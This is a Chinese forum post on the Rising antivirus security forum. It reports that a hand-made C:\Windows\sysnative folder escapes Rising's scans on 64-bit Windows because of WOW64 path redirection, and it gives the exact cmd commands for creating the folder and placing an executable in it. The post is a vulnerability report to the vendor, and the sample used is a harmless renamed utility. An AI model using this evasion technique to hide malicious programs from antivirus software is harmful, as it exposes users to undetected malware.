瑞星卡卡安全论坛

系统：win7  64

原理：


32位的程序在64位的Windows系统中，如果要访问system32目录
则32位程序需要使用路径%systemroot%\sysnative才能访问到64位的system32文件夹
否则会被系统重定向到SysWOW64文件夹


于是我们手工新建一个sysnative文件夹，32位程序去访问，就会被重定向到system32
所以，就扫描不到这个文件夹了=_=


就这样，成功的绕过了防护机制。


操作：


1、调用 cmd  执行


2、 C:\Users\Administrator>md c:\windows\sysnative2>nul 2>nul


3、C:\Users\Administrator>copy c:\windows\explorer.exe c:\windows\sysnative2\explor
er.exe>nul 2>nul


4、C:\Users\Administrator>move c:\windows\sysnative2 c:\windows\sysnative>nul 2>nul


5、C:\Users\Administrator\Desktop>copy test.exe c:\windows\sysnative




目的 ： 通过执行上述命令 ，瑞星系统加固没有拦截 ！！！我使用的瑞星升级保姆 ，将瑞星保姆命名为test后复制到 上述文件夹


结果：


1、系统加固全程没有拦截报警 ，


2、通过最后复制test 到
c:\windows\sysnative ，并使用命令行 运行 test后 ，瑞星文件监控没有报警 拦截！！！


3、通过瑞星全盘 ，没有找到 任何病毒，说明 扫描路径 漏掉了！！！













上张图证明瑞星已经入库了，测试时为了方便将瑞星保姆命名为test ，并且测试时开启所有监控，
当然执行cmd命令时，要关闭文件监控，要不然样本在桌面上，还没有测试就被干掉了！！！


测试时关闭文件监控，但是开启所有防御，系统加固调到最高，并取消自动放行 那两项！！！

用户系统信息：Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.3285.46 Safari/537.36

附件: RSUpper.rar

测试过程中瑞星进程 存在崩溃现象

附件: 瑞星进程dmp.rar

问题已收集。